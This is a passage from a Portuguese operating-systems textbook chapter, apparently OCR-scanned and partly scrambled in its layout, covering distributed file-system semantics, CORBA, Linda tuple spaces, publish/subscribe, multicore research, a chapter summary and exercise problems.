ção. A comunicação é conseguida quando um processo 
escreve dados em um arquivo e outros o leem de volta. 
Muitas das questões dos sistemas de arquivos padrão 
surgem aqui, mas também algumas novas relacionadas 
à distribuição. 


Modelo de transferência 


A primeira questão é a escolha entre o modelo up- 
load/download e o modelo de acesso remoto. No pri- 
meiro, mostrado na Figura 8.33(a), um processo acessa 
um arquivo primeiramente copiando-o do servidor re- 
moto onde ele vive. Se o arquivo é somente de leitura, 
ele é então lido localmente, em busca de alto desempe- 
nho. Se o arquivo deve ser escrito, é escrito localmente. 
Quando o processo termina de usá-lo, o arquivo atua- 
lizado é colocado de volta no servidor. Com o modelo 
de acesso remoto, o arquivo fica no servidor e o cliente 
envia comandos para que o trabalho seja feito no servi- 
dor, como mostrado na Figura 8.33(b). 

As vantagens do modelo upload/download são a sua 
simplicidade, e o fato de que transferir arquivos intei- 
ros ao mesmo tempo é mais eficiente do que transferi- 
-los em pequenas partes. As desvantagens são que deve 
haver espaço suficiente para o armazenamento do ar- 
quivo inteiro localmente, mover o arquivo inteiro é um 
desperdício se apenas partes dele forem necessárias e 
surgirão problemas de consistência se houver múltiplos 
usuários concorrentes. 
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Jell UE:ÆEJ (a) O modelo upload/download. (b) O modelo de acesso remoto. 
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A hierarquia de diretórios 


Os arquivos são apenas parte da história. A outra par- 
te é o sistema de diretórios. Todos os sistemas de arqui- 
vos distribuídos suportam diretórios contendo múltiplos 
arquivos. A próxima questão de projeto é se todos os 
clientes têm a mesma visão da hierarquia de diretório. 
Como exemplo do que queremos dizer, considere a Fi- 
gura 8.34. Na Figura 8.34(a) mostramos dois servidores 
de arquivos, cada um contendo três diretórios e alguns 
arquivos. Na Figura 8.34(b) temos um sistema no qual 
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todos os clientes (e outras máquinas) têm a mesma visão 
do sistema de arquivos distribuído. Se o caminho /D/E/x 
for válido em uma máquina, ele será válido em todas. 
Em comparação, na Figura 8.34(c), diferentes má- 
quinas têm diferentes visões do sistema de arquivos. 
Para repetir o exemplo anterior, o caminho /D/E/x pode 
muito bem ser válido para o cliente 1, mas não para o 
cliente 2. Nos sistemas que gerenciam múltiplos ser- 
vidores de arquivos por meio de montagem remota, a 
Figura 8.34(c) é a norma. Ela é flexível e direta de se 
implementar, mas tem a desvantagem de não fazer com 
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que o sistema inteiro se comporte como um único siste- 
ma de tempo compartilhado tradicional. Em um sistema 
de tempo compartilhado, o sistema de arquivos parece 
o mesmo para qualquer processo, como no modelo da 
Figura 8.34(b). Essa propriedade torna um sistema mais 
fácil de programar e compreender. 

Uma questão relacionada de perto diz respeito a ha- 
ver ou não um diretório raiz global, que todas as má- 
quinas reconhecem como a raiz. Uma maneira de se ter 
um diretório raiz global é fazer com que a raiz contenha 
uma entrada para cada servidor e nada mais. Nessas cir- 
cunstâncias, caminhos assumem a forma /server/path, o 
que tem suas próprias desvantagens, mas pelo menos é 
a mesma em toda parte no sistema. 


Transparência de nomeação 


O principal problema com essa forma de nomeação 
é que ela não é totalmente transparente. Duas formas 
de transparência são relevantes nesse contexto e valem 
a pena ser distinguidas. A primeira, transparência de 
localização, significa que o nome do caminho não dá 
dica alguma para onde o arquivo está localizado. Um 
caminho como /serverl/dirl/dir2/x diz a todos que x 
está localizado no servidor 1, mas não diz onde esse ser- 
vidor está localizado. O servidor é livre para se mover 
para qualquer parte que ele quiser sem que o nome do 
caminho precise ser modificado. Portanto, esse sistema 
tem transparência de localização. 

No entanto, suponha que o arquivo x seja extre- 
mamente grande e o espaço restrito no servidor 1. 
Além disso, suponha que exista espaço suficiente no 
servidor 2. O sistema pode muito bem mover x para 
o servidor 2 automaticamente. Infelizmente, quando o 
primeiro componente de todos os nomes de caminho 
está no servidor, o sistema não pode mover o arquivo 
para o outro servidor automaticamente, mesmo que dirl 
e dir2 existam em ambos servidores. O problema é que 
mover 0 arquivo automaticamente muda o nome de ca- 
minho de /server1/dirl/dir2/x para /server2/dir 1/dir2/x. 
Programas que têm a primeira cadeia de caracteres inse- 
rida cessarão de trabalhar se o caminho mudar. Um sis- 
tema no qual arquivos podem ser movidos sem que seus 
nomes sejam modificados possuem independência de 
localização. Um sistema distribuído que especifica os 
nomes de máquinas ou servidores em nomes de cami- 
nhos claramente não é independente de localização. Um 
sistema que se baseia na montagem remota também não 
o é, já que não é possível mover um arquivo de um gru- 
po de arquivos (a unidade de montagem) para outro e 
ainda ser capaz de usar o velho nome de caminho. A 
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independência de localização não é algo facil de conse- 
guir, mas é uma propriedade desejável de se ter em um 
sistema distribuído. 

Resumindo o que dissemos, existem três abordagens 
comuns para a nomeação de arquivos e diretórios em 
um sistema distribuído: 


1. Nomeação de máquina + caminho, como /maqui- 
na/caminho ou maquina:caminho. 

2. Montagem de sistemas de arquivos remotos na 
hierarquia de arquivos local. 

3. Um único espaço de nome que parece o mesmo 
em todas as máquinas. 


Os dois primeiros são fáceis de implementar, espe- 
cialmente como uma maneira de conectar sistemas exis- 
tentes que não foram projetados para uso distribuído. O 
último é difícil e exige um projeto cuidadoso, mas torna 
a vida mais fácil para programadores e usuários. 


Semântica do compartilhamento de arquivos 


Quando dois ou mais usuários compartilham o mes- 
mo arquivo, é necessário definir a semântica da leitura 
e escrita precisamente para evitar problemas. Em siste- 
mas de um único processador, a semântica normalmen- 
te afirma que, quando uma chamada de sistema read 
segue uma chamada de sistema write, a read retorna o 
valor recém-escrito, como mostrado na Figura 8.35(a). 
De modo similar, quando duas writes acontecem em 
rápida sucessão, seguidas de uma read, o valor lido é 
o valor armazenado na última escrita. Na realidade, o 
sistema obriga um ordenamento em todas as chamadas 
de sistema, e todos os processadores veem o mesmo or- 
denamento. Nós nos referiremos a esse modelo como 
consistência sequencial. 

Em um sistema distribuído, a consistência sequen- 
cial pode ser conseguida facilmente desde que exista 
apenas um servidor de arquivos e os clientes não arma- 
zenem arquivos em cache. Todas as reads e writes vão 
diretamente para o servidor de arquivos, que as proces- 
sa de maneira estritamente sequencial. 

Na prática, no entanto, o desempenho de um siste- 
ma distribuído no qual todas as solicitações de arquivos 
devem ir para um único servidor é muitas vezes fraco. 
Esse problema é com frequência solucionado permitin- 
do que clientes mantenham cópias locais de arquivos 
pesadamente usados em suas caches privadas. No en- 
tanto, se o cliente 1 modificar um arquivo armazenado 
em cache localmente e logo em seguida o cliente 2 ler 
o arquivo do servidor, o segundo cliente receberá um 
arquivo obsoleto, como ilustrado na Figura 8.35(b). 
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a (ele) yWBeiy (a) Consistência sequencial. (b) Em um sistema distribuído com armazenamento em cache, a leitura de um arquivo pode 


retornar um valor obsoleto. 


Processador único 


1. Escrita de “c” , 
Arquivo 
original 





2. Leitura obtém “abc” 


(a) 


Uma saída para essa dificuldade é propagar todas as 
mudanças para arquivos em cache de volta para o ser- 
vidor imediatamente. Embora seja algo conceitualmen- 
te simples, essa abordagem é ineficiente. Uma solução 
alternativa é relaxar a semântica do compartilhamento 
de arquivos. Em vez de requerer que uma read veja os 
efeitos de todas as writes anteriores, você pode ter uma 
nova regra que diz: “mudanças para um arquivo aberto 
são inicialmente visíveis somente para o processo que 
as fez. Somente quando o arquivo está fechado as mu- 
danças são visíveis para os outros processos”. A adoção 
de uma regra assim não muda o que acontece na Figura 
8.35(b), mas redefine o comportamento real (B receben- 
do o valor original do arquivo) como o correto. Quando 
o cliente 1 fecha o arquivo, ele envia uma cópia de volta 
para o servidor, então reads subsequentes recebem um 
novo valor, como solicitado. De fato, esse é o modelo 
upload/download mostrado na Figura 8.33. Essa semân- 
tica é amplamente implementada e é conhecida como 
semântica de sessão. 

O uso da semântica de sessão levanta a questão do 
que acontece se dois ou mais clientes estão usando si- 
multaneamente suas caches e modificando o mesmo 
arquivo. Uma solução é dizer que à medida que cada 


2. Escrita de “c” 


Cliente 1 







1. Leitura de “ab” 


Servidor de arquivos 


3. Leitura obtém “ab” 
Cliente 2 


(b) 


arquivo é fechado por sua vez, o seu valor é enviado 
de volta para o servidor, de maneira que o resultado 
final depende de quem fechar por último. Uma alter- 
nativa menos agradável, mas ligeiramente mais fácil 
de implementar, é dizer que o resultado final é um dos 
candidatos, mas deixar a escolha de qual deles sem ser 
especificada. 

Uma abordagem alternativa para a semântica de 
sessão é usar o modelo upload/download, mas auto- 
maticamente colocar um travamento no arquivo que 
tenha sido baixado. Tentativas por parte de outros 
clientes para baixar o arquivo serão adiadas até que o 
primeiro cliente tenha retornado a ele. Se existir uma 
demanda pesada por um arquivo, o servidor pode en- 
viar mensagens para o cliente que o detém, pedindo a 
ele para apressar-se, mas isso talvez não venha a aju- 
dar. De modo geral, acertar a semântica de arquivos 
compartilhados é um negócio complicado sem solu- 
ções elegantes e eficientes. 


8.3.5 Middleware baseado em objetos 


Agora vamos examinar um terceiro paradigma. Em 
vez de dizer que tudo é um documento ou tudo é um 


arquivo, dizemos que tudo é um objeto. Um objeto é 
uma coleção de variáveis que são colocadas juntas com 
um conjunto de rotinas de acesso, chamadas métodos. 
Processos não têm permissão para acessar as variáveis 
diretamente. Em vez disso, eles precisam invocar os 
métodos. 

Algumas linguagens de programação, como C++ e 
Java, são orientadas a objetos, mas a objetos em nível de 
linguagem em vez de em tempo de execução. Um sis- 
tema bastante conhecido baseado em objetos em tempo 
de execução é o CORBA (Common Object Request 
Broker Architecture) (VINOSKI, 1997). CORBA é 
um sistema cliente-servidor, no qual os processos clien- 
tes podem invocar operações em objetos localizados em 
(possivelmente remotas) máquinas servidoras. CORBA 
foi projetado para um sistema heterogêneo executando 
uma série de plataformas de hardware e sistemas opera- 
cionais e programado em uma série de linguagens. Para 
tornar possível para um cliente em uma plataforma in- 
vocar um cliente em uma plataforma diferente, ORBs 
(Object Request Brokers — agentes de solicitação de 
objetos) são interpostos entre o cliente e o servidor para 
permitir que eles se correspondam. Os ORBs desem- 
penham um papel importante no CORBA, fornecendo 
mesmo seu nome ao sistema. 

Cada objeto CORBA é determinado por uma defi- 
nição de interface em uma linguagem chamada IDL 
(Interface Definition Language — linguagem de de- 
finição de interface), que diz quais métodos o objeto 
exporta e que tipos de parâmetros cada um espera. A 
especificação IDL pode ser compilada em uma rotina 
do tipo stub e armazenada em uma biblioteca. Se um 
processo cliente sabe antecipadamente que ele precisa- 
rá de acesso a um determinado objeto, ele é ligado com 
o código do stub do cliente daquele objeto. A especifi- 
cação IDL também pode ser compilada em uma rotina 
esqueleto que é usada do lado do servidor. Se não for 
conhecido antes quais objetos CORBA um processo 
precisa usar, a invocação dinâmica também é possível, 
mas como isso funciona está além do escopo do nosso 
tratamento. 

Quando um objeto CORBA é criado, uma referência 
também é criada e retornada para o processo de criação. 
Essa referência é como o processo identifica o objeto 
para invocações subsequentes de seus métodos. A refe- 
rência pode ser passada para outros processos ou arma- 
zenada em um diretório de objetos. 

Para invocar um método em um objeto, um processo 
cliente deve primeiro adquirir uma referência para aque- 
le objeto. A referência pode vir diretamente do proces- 
so criador ou, de maneira mais provável, procurando-a 
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pelo nome ou função em algum tipo de diretório. Uma 
vez que a referência do objeto está disponível, o proces- 
so cliente prepara os parâmetros para as chamadas dos 
métodos em uma estrutura conveniente e então contata 
o ORB cliente. Por sua vez, o ORB cliente envia uma 
mensagem para o ORB servidor, que na realidade invo- 
ca o método sobre o objeto. Todo o mecanismo é similar 
à RPC. 

A função dos ORBs é esconder toda a distribuição 
de baixo nível e detalhes de comunicação dos códigos 
do cliente e do servidor. Em particular, os ORBs escon- 
dem do cliente a localização do servidor, se o servidor 
é um programa binário ou um script, qual o hardwa- 
re e sistema operacional em que o servidor executa, se 
o objeto está atualmente ativo, e como os dois ORBs 
comunicam-se (por exemplo, TCP/IP, RPC, memória 
compartilhada etc.). 

Na primeira versão do CORBA, o protocolo entre o 
ORB cliente e o ORB servidor não era especificado. Em 
consequência, todo vendedor ORB usava um protocolo 
diferente e dois deles não podiam dialogar um com o 
outro. Na versão 2.0, o protocolo foi especificado. Para 
comunicação pela internet, o protocolo é chamado de 
HOP (Internet InterOrb Protocol — protocolo inter- 
orb da internet). 

Para possibilitar o uso de objetos no CORBA que 
não foram escritos para o sistema, cada objeto pode ser 
equipado com um adaptador de objeto. Trata-se de um 
invólucro que realiza tarefas, como registrar o objeto, 
gerar referências do objeto e ativar o objeto, se ele for 
invocado quando não estiver ativo. O arranjo de todas 
as partes CORBA é mostrado na Figura 8.36. 

Um sério problema com o CORBA é que todos ob- 
jetos estão localizados somente em um servidor, o que 
significa que o desempenho será terrível para objetos 
que são muito usados em máquinas clientes mundo afo- 
ra. Na prática, o CORBA funciona de maneira aceitá- 
vel somente em sistema de pequena escala, como para 
conectar processos em um computador, uma LAN, ou 
dentro de uma única empresa. 


8.3.6 Middleware baseado em coordenação 


Nosso último paradigma para um sistema distribui- 
do é chamado de middleware baseado em coordena- 
ção. Nós o discutiremos examinando o sistema Linda, 
um projeto de pesquisa acadêmica que iniciou a área 
toda. 

Linda é um sistema moderno para comunicação e 
sincronização desenvolvido na Universidade de Yale 
por David Gelernter e seu estudante Nick Carriero 
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KeU TE:EJ Os principais elementos de um sistema distribuído baseado em CORBA. As partes CORBA são mostradas em cinza. 
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(CARRIERO e GELERNTER, 1989; e GELERNTER, 
1985). No Linda, processos independentes comunicam- 
-se por um espaço de tuplas abstrato. O espaço de tuplas 
é global para todo o sistema, e processos em qualquer 
máquina podem inserir tuplas no espaço de tuplas ou 
removê-las deste espaço sem levar em consideração 
como ou onde elas estão armazenadas. Para o usuário, o 
espaço de tuplas parece uma grande memória comparti- 
lhada global, como vimos em várias formas antes, como 
na Figura 8.21(c). 

Uma tupla é como uma estrutura em C ou Java. Ela 
consiste em um ou mais campos, cada um dos quais é 
um valor de algum tipo suportado pela linguagem base 
(Linda é implementada adicionando uma biblioteca a 
uma linguagem existente, como em C). Para C-Linda, 
tipos de campo incluem inteiros, inteiros longos e nú- 
meros de ponto flutuante, assim como tipos compos- 
tos como vetores (incluindo cadeias de caracteres) e 
estruturas (mas não outras tuplas). Diferentemente de 
objetos, tuplas são dados puros; elas não têm quaisquer 
métodos associados. A Figura 8.37 mostra três tuplas 
como exemplos. 

Quatro operações são fornecidas sobre as tuplas. A 
primeira, out, coloca uma tupla no espaço de tuplas. Por 
exemplo, 


out(“abc”, 2, 5); 


coloca a tupla (“abc”, 2, 5) no espaço de tuplas. Os cam- 
pos de out são normalmente constantes, variáveis ou ex- 
pressões, como em 


out(“matrix-1”, i, j, 3.14); 


(cj E: ÆA Três tuplas no sistema Linda. 
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("matrix-1", 1, 6, 3.14) 
("family", "is-sister”, "Stephany", "Roberta") 
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que coloca uma tupla com quatro campos, o segundo e 
terceiro dos quais são determinados pelos valores atuais 
das variáveis i e j. 

Tuplas são resgatadas do espaço de tuplas pela primi- 
tiva in. Elas são endereçadas pelo conteúdo em vez de por 
um nome ou endereço. Os campos de in podem ser expres- 
sões ou parâmetros formais. Considere, por exemplo, 


in(“abc”, 2, ?i); 


Essa operação “pesquisa” o espaço de tuplas à pro- 
cura de uma tupla consistindo na cadeia “abc”, o inteiro 
2 e um terceiro campo contendo qualquer inteiro (pre- 
sumindo que i seja um inteiro). Se encontrada, a tupla é 
removida do espaço de tuplas e à variável i é designado 
o valor do terceiro campo. A correspondência e remoção 
são atômicas, de maneira que, se dois processos executa- 
rem a mesma operação in simultaneamente, apenas um 
deles terá sucesso, a não ser que duas ou mais tuplas cor- 
respondentes estejam presentes. O espaço de tuplas pode 
conter até mesmo múltiplas cópias da mesma tupla. 

O algoritmo de correspondência usado por n é di- 
reto. Os campos da primitiva in, chamados de modelo 
(template), são (conceitualmente) comparados aos cam- 
pos correspondentes de cada tupla no espaço de tuplas. 
Uma correspondência ocorre se as três condições a se- 
guir forem todas atendidas: 


1. O modelo e a tupla têm o mesmo número de 
campos. 

2. Os tipos dos campos correspondentes são iguais. 

3. Cada constante ou variável no modelo correspon- 
de a seu campo de tupla. 


Parâmetros formais, indicados por um sinal de in- 
terrogação seguidos por um nome de variável ou tipo, 
não participam na correspondência (exceto para confe- 
rência de tipos), embora aqueles que contêm um nome 
de variável sejam associados após uma correspondência 
bem-sucedida. 


Se nenhuma tupla correspondente estiver presente, 
o processo chamador é suspenso até que outro proces- 
so insira a tupla necessária, momento em que o processo 
chamado é automaticamente revivido e é alocada uma 
nova tupla. O fato de que os processos bloqueiam e des- 
bloqueiam automaticamente significa que, se um pro- 
cesso estiver prestes a colocar uma tupla e outro prestes 
a obter a mesma tupla, não importa quem executará pri- 
meiro. A única diferença é que se o in for feito antes 
do out, haverá um ligeiro atraso até que a tupla esteja 
disponível para remoção. 

O fato de os processos bloquearem quando uma tupla 
necessária não está presente pode ser usado de muitas 
maneiras. Por exemplo, para implementar semáforos. 
Para criar ou fazer um up no semáforo S, um processo 
pode executar 


out(“semaphore S”); 
Para fazer um down, ele executa 
in(“semaphore S”); 


O estado do semáforo S é determinado pelo numero 
de tuplas (“semáforo S”) no espaço de tuplas. Se nenhu- 
ma existir, qualquer tentativa de conseguir uma bloque- 
ará até que algum outro processo forneça uma. 

Além de out e in, Linda também tem uma operação 
primitiva read, que é a mesma que in, exceto por não re- 
mover a tupla do espaço de tuplas. Existe também uma 
primitiva eval, que faz que os parâmetros sejam ava- 
liados em paralelo e a tupla resultante seja colocada no 
espaço de tuplas. Esse mecanismo pode ser usado para 
realizar cálculos arbitrários. É assim que os processos 
paralelos são criados em Linda. 


Publicar/assinar 


Nosso próximo exemplo de um modelo baseado em 
coordenação foi inspirado em Linda e é chamado de pu- 
blicar/assinar (publish/subscribe) (OKI et al., 1993). Ele 
consiste em uma série de processos conectados por uma 
rede de difusão. Cada processo pode ser um produtor de 
informações, um consumidor de informações, ou ambos. 

Quando um produtor de informações tem uma infor- 
mação nova (por exemplo, um novo preço de uma ação), 
ele transmite a informação como uma tupla na rede. Essa 
ação é chamada de publicação. Cada tupla contém uma 
linha de assunto hierárquica contendo múltiplos campos 
separados por períodos. Processos que estão interessados 
em determinadas informações podem assinar para rece- 
ber determinados assuntos, incluindo o uso de símbolos 
na linha do assunto. A assinatura é feita dizendo a um 
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processo daemon de tuplas, na mesma maquina que mo- 
nitora tuplas publicadas, quais assuntos procurar. 

O publicar/assinar é implementado como ilustrado 
na Figura 8.38. Quando um processo tem uma tupla 
para publicar, ele a transmite na LAN local. O dae- 
mon da tupla em cada maquina copia todas as tuplas 
transmitidas em sua RAM. Ele então inspeciona a 
linha do assunto para ver quais processos estão inte- 
ressados, enviando uma cópia para cada um que esti- 
ver. Tuplas também podem ser transmitidas para uma 
rede de longa distância ou para a internet utilizando 
uma máquina em cada LAN como uma roteadora de 
informações, coletando todas as tuplas publicadas e 
então as enviando para outras LANs para serem re- 
transmitidas. Esse repasse também pode ser feito de 
modo inteligente, enviando uma tupla para uma LAN 
remota somente se aquela LAN remota tiver pelo me- 
nos um assinante que queira a tupla. Para realizar isso 
é necessário que os roteadores de informações tro- 
quem informações a respeito dos assinantes. 

Vários tipos de semântica podem ser implementados, 
incluindo a entrega confiável e a entrega garantida, mes- 
mo na presença de quedas no sistema. No segundo caso, é 
necessário armazenar tuplas antigas caso elas sejam neces- 
sárias mais tarde. Uma maneira de armazená-las é ligar um 
sistema de banco de dados ao sistema e fazer que ele assine 
para receber todas as tuplas. Isso pode ser feito revestindo 
o sistema de banco de dados em um adaptador, a fim de 
permitir que um banco de dados existente trabalhe com o 
modelo publicar/assinar. À medida que as tuplas chegam, 
o adaptador as captura e as coloca no banco de dados. 

O modelo publicar/assinar desacopla inteiramente 
os produtores dos consumidores, assim como faz o Lin- 
da. Entretanto, às vezes é útil saber quem mais está lá. 
Essa informação pode ser adquirida publicando a tupla 
que basicamente pergunta: “Quem ai está interessado 
em x?” Respostas retornam em forma de tuplas que di- 
zem: “Eu estou interessado em x”. 


8.4 Pesquisas sobre sistemas 
multiprocessadores 


Poucos tópicos na pesquisa de sistemas operacionais 
são tão populares quanto multinúcleos, multiprocessado- 
res e sistemas distribuídos. Além dos problemas diretos 
de mapear a funcionalidade de um sistema operacional 
em um sistema consistindo em múltiplos núcleos proces- 
sadores, há muitos problemas de pesquisa em aberto re- 
lacionados à sincronização e consistência, e como tornar 
esses sistemas mais rápidos e mais confiáveis. 
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Alguns esforços de pesquisa focaram no projeto de 
novos sistemas operacionais desde o início especifica- 
mente para hardwares multinucleos. Por exemplo, o sis- 
tema operacional Corey aborda questões de desempenho 
causadas pelo compartilhamento de estruturas de dados 
através de múltiplos núcleos (BOY D-WICKIZER etal., 
2008). Ao arranjar cuidadosamente estruturas de dados 
de núcleo de tal maneira que nenhum compartilhamen- 
to seja necessário, muitos dos gargalos de desempenho 
desaparecem. Similarmente, Barrelfish (BAUMANN et 
al., 2009) é um novo sistema operacional motivado pelo 
rápido crescimento no número de núcleos por um lado, 
e o crescimento da diversidade de hardwares do outro. 
Ele modela o sistema operacional nos sistemas distri- 
buídos com a troca de mensagens em vez da memória 
compartilhada como modelo de comunicação. Outros 
sistemas operacionais buscam a economia de escala e o 
desempenho. Fos (WENTZLAFF et al., 2010) é um sis- 
tema operacional que foi projetado para ser escalável do 
pequeno (CPUs multinúcleos) para o muito grande (nu- 
vens). Enquanto isso, NewtOS (HRUBY et al., 2012; 
e HRUBY et al., 2013) é um novo sistema operacional 
com múltiplos servidores que busca tanto a confiabili- 
dade (com um projeto modular e muitos componentes 
isolados baseados originalmente no Minix 3) quanto o 
desempenho (que tradicionalmente era um ponto fraco 
desses sistemas de múltiplos servidores modulares). 

Sistemas multinucleos não são somente para novos 
projetos. Em Boyd-Wickizer et al. (2010), os pesquisa- 
dores estudam e removem os gargalos que eles encon- 
tram quando escalam o Linux para uma máquina de 48 


8.5 Resumo 


Sistemas de computadores podem ser tornados mais 
rápidos e mais confiáveis com a utilização de múltiplas 
CPUs. Quatro organizações para sistemas com múltiplas 


núcleos. Eles mostram que esses sistemas, se projetados 
cuidadosamente, podem ser trabalhados para escalar 
muito bem. Clements et al. (2013) investigam o princi- 
pio fundamental que governa se uma API pode ser im- 
plementada ou não de maneira escalável. Eles mostram 
que sempre que as operações da interface comutam, uma 
implementação escalável da interface existe. Com esse 
conhecimento, os projetistas de sistemas operacionais 
podem construir sistemas operacionais mais escaláveis. 

Grande parte da pesquisa de sistemas operacionais 
em anos recentes também foi feita para permitir que 
grandes aplicações escalem em ambientes de multinu- 
cleos e multiprocessadores. Um exemplo é o motor de 
banco de dados escalável descrito por Salomie et al. 
(2011). De novo, a solução é conseguir a escalabilidade 
replicando o banco de dados em vez de tentar esconder 
a natureza paralela do hardware. 

Depurar aplicações paralelas é muito difícil, e con- 
dições de corrida são difíceis de reproduzir. Viennot et 
al. (2013) mostra como o replay pode ajudar a depurar 
o software em sistemas multinucleos. Lachaize et al. 
fornecem um seletor de perfil para sistemas multinúcle- 
os, e Kasikci et al. (2012) apresentam um trabalho não 
somente sobre a detecção de condições de corrida em 
softwares, como até uma maneira de distinguir corridas 
boas das ruins. 

Por fim, há muitos trabalhos sobre a redução do con- 
sumo de energia em multiprocessadores. Chen et al. 
(2013) propõem o uso de contêineres de energia para 
fornecer uma energia de granulação fina (fine-grained 
power) e gerenciamento da energia. 


CPUs são os multiprocessadores, multicomputadores, 
máquinas virtuais e sistemas distribuídos. Cada uma 
delas têm suas próprias características e questões. 


Um multiprocessador consiste em duas ou mais 
CPUs que compartilham uma RAM comum. Muitas 
vezes essas mesmas CPUs têm múltiplos núcleos. Os 
núcleos e as CPUs podem ser interconectados por 
meio de um barramento, um barramento cruzado, ou 
uma rede de comutação de múltiplos estágios. Várias 
configurações de sistemas operacionais são possíveis, 
incluindo dar a cada CPU seu próprio sistema opera- 
cional, tendo um sistema operacional mestre com o 
resto sendo escravos, ou tendo um multiprocessador 
simétrico, no qual há uma cópia do sistema operacio- 
nal que qualquer CPU pode executar. No segundo caso, 
variáveis de travamento são necessárias para fornecer 
a sincronização. Quando uma variável de travamento 
não está disponível, uma CPU pode fazer uma espe- 
ra ocupada ou um chaveamento de contexto. Vários 
algoritmos de escalonamento são possíveis, incluindo 
compartilhamento de tempo, compartilhamento de es- 
paço e escalonamento em bando. 

Multicomputadores também têm duas ou mais 
CPUs, mas cada uma dessas CPUs tem sua própria 
memória privada. Eles não compartilham qualquer 
RAM em comum, de maneira que toda a comunicação 


PROBLEMAS 


p 


. O sistema de grupo de notícias (newsgroup) USENET 
ou o projeto SETI@home podem ser considerados sis- 
temas distribuídos? (SETI@home usa diversos milhões 
de computadores pessoais ociosos para analisar dados de 
radiotelescópio em busca de inteligência extraterrestre). 
Se afirmativo, como eles se relacionam com as catego- 
rias descritas na Figura 8.1? 

2. O que acontece se três CPUs em um multiprocessador 
tentam acessar exatamente a mesma palavra de memória 
exatamente no mesmo instante”? 

3. Seuma CPU emite uma solicitação de memória a cada ins- 
trução e o computador executa a 200 MIPS, quantas CPUs 
serão necessárias para saturar um barramento de 400 MHz? 
Presuma que uma referência de memória exija um ciclo de 
barramento. Agora repita esse problema para um sistema 
no qual o armazenamento em cache é usado e as caches 
têm um índice de acerto (Ait rate) de 90%. Por fim, qual 
taxa de acerto seria necessária para permitir que 32 CPUs 
compartilhassem o barramento sem sobrecarrega-lo? 

4. Suponha que o cabo entre o comutador 2A e o comuta- 
dor 2B na rede ômega da Figura 8.5 rompe-se. Quem é 
isolado de quem? 

5. Como o tratamento de sinais é feito no modelo da Figura 

8.7? 
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utiliza a troca de mensagens. Em alguns casos, a placa 
de interface de rede tem a sua propria CPU, caso em 
que a comunicação entre a CPU principal e a CPU da 
placa de interface tem de ser cuidadosamente organi- 
zada para evitar condições de corrida. A comunicação 
no nível do usuário em multicomputadores muitas ve- 
zes utiliza chamadas de rotina remotas, mas a memória 
compartilhada distribuída também pode ser usada. O 
balanceamento de carga dos processos é uma questão 
aqui, e os vários algoritmos usados para ele incluem 
algoritmos iniciados pelo emissor, os iniciados pelo 
receptor e os de concorrência. 

Sistemas distribuídos são sistemas acoplados de 
maneira desagregada, em que cada um dos nós é um 
computador completo com um conjunto de periféricos 
completo e seu próprio sistema operacional. Muitas ve- 
zes esses sistemas estão disseminados por uma grande 
área geográfica. Um Middleware é muitas vezes coloca- 
do sobre o sistema operacional para fornecer uma cama- 
da uniforme para as aplicações interagirem. Os vários 
tipos incluem o baseado em documentos, baseado em 
arquivos, baseado em objetos e baseado em coordena- 
ção. Alguns exemplos são WWW, CORBA e Linda. 


6. Quando uma chamada de sistema é feita no modelo 
da Figura 8.8, um problema precisa ser solucionado 
imediatamente após a interrupção de software que não 
ocorre no modelo da Figura 8.7. Qual é a natureza desse 
problema e como ele pode ser solucionado? 

7. Reescreva o código enter region da Figura 2.22 usando 
uma leitura pura para reduzir a ultrapaginação induzida 
pela instrução TSL. 

8. CPUs multinúcleo estão começando a aparecer em com- 
putadores de mesa e laptops convencionais. Computado- 
res com dezenas ou centenas de núcleos não estão muito 
distantes. Uma maneira possível de se aproveitar essa 
potência é colocar em paralelo aplicações padrão como 
o editor de texto ou o navegador da web. Outra maneira 
possível de se aproveitar a potência é colocar em pa- 
ralelo os serviços oferecidos pelo sistema operacional 
— por exemplo, processamento TCP — e serviços de 
biblioteca comumente usados — por exemplo, funções 
de biblioteca http seguras. Qual abordagem parece ser a 
mais promissora? Por quê? 

9. As regiões críticas em seções código são realmente ne- 
cessárias em um sistema operacional SMP para evitar 
condições de corrida, ou mutexes em estruturas de dados 
darão conta do recado? 
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Quando a instrução TSL é usada na sincronização de 
multiprocessadores, o bloco da cache contendo o mutex 
será mandado de um lado para o outro entre a CPU que 
detém a variável de travamento e a CPU requisitando-o, 
se ambas seguirem tocando o bloco. Para reduzir o tráfe- 
go de barramento, a CPU requerente executa uma TSL 
a cada 50 ciclos de barramento, mas a CPU que detém 
a variável de travamento sempre toca o bloco da cache 
entre as instruções TSL. Se um bloco da cache consiste 
em 16 palavras de 32 bits, e cada uma delas exige um ci- 
clo de barramento para transferir e o barramento executa 
a 400 MHz, qual fração da banda larga do barramento 
é consumida ao se mover o bloco da cache de um lado 
para outro? 

No texto, foi sugerido que um algoritmo de recuo expo- 
nencial binário fosse usado entre os usos de TSL para 
testar uma variável de travamento. Também foi sugeri- 
do haver um atraso máximo entre os testes. O algorit- 
mo funcionaria corretamente se não houvesse um atraso 
máximo? 

Suponha que a instrução TSL não estivesse disponível 
para sincronizar um multiprocessador. Em vez disso, foi 
fornecida outra instrução, SWP, que trocaria atomica- 
mente os conteúdos de um registrador com uma palavra 
na memória. Ela poderia ser usada para sincronizar o 
multiprocessador? Se afirmativo, como ela poderia ser 
usada? Se negativo, por que ela não funciona? 

Nesse problema você deve calcular quanta carga no 
barramento uma trava giratória coloca sobre o barra- 
mento. Imagine que cada instrução executada por uma 
CPU leva 5 ns. Após uma instrução ter sido completada, 
quaisquer ciclos de barramento necessários para TSL, 
por exemplo, são executados. Cada ciclo de barramento 
leva adicionais 10 ns acima e além do tempo de execu- 
ção da instrução. Se um processo está tentando entrar 
em uma região crítica usando um laço de TSL, qual fra- 
ção da largura de banda do barramento ele consome? 
Presuma que o armazenamento em cache normal esteja 
funcionando de modo que buscar uma instrução dentro 
do laço não consome ciclos de barramento. 

O escalonamento por afinidade reduz os erros de ca- 
che. Ele também reduz os erros de TLB? E as faltas de 
páginas? 

Para cada uma das topologias da Figura 8.16, qual é o 
diâmetro da rede de interconexão? Conte todos os pas- 
sos (hospedeiro-roteador e roteador-roteador) igualmente 
para esse problema. 

Considere a topologia de toro duplo da Figura 8.16(d), 
mas expandida para o tamanho k x k . Qual é o diâmetro 
darede? (Dica: considere k ímpar e k par diferentemente). 
A largura de banda da bissecção de uma rede de inter- 
conexão é muitas vezes usada como uma medida de 
sua capacidade. Ela é calculada removendo um número 
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mínimo de links que divide a rede em duas unidades de 
tamanho igual. A capacidade dos links removidos é so- 
mada. Se há muitas maneiras de se fazer a divisão, a 
maneira com a largura de banda mínima é a largura de 
banda da bissecção. Para uma rede de interconexão con- 
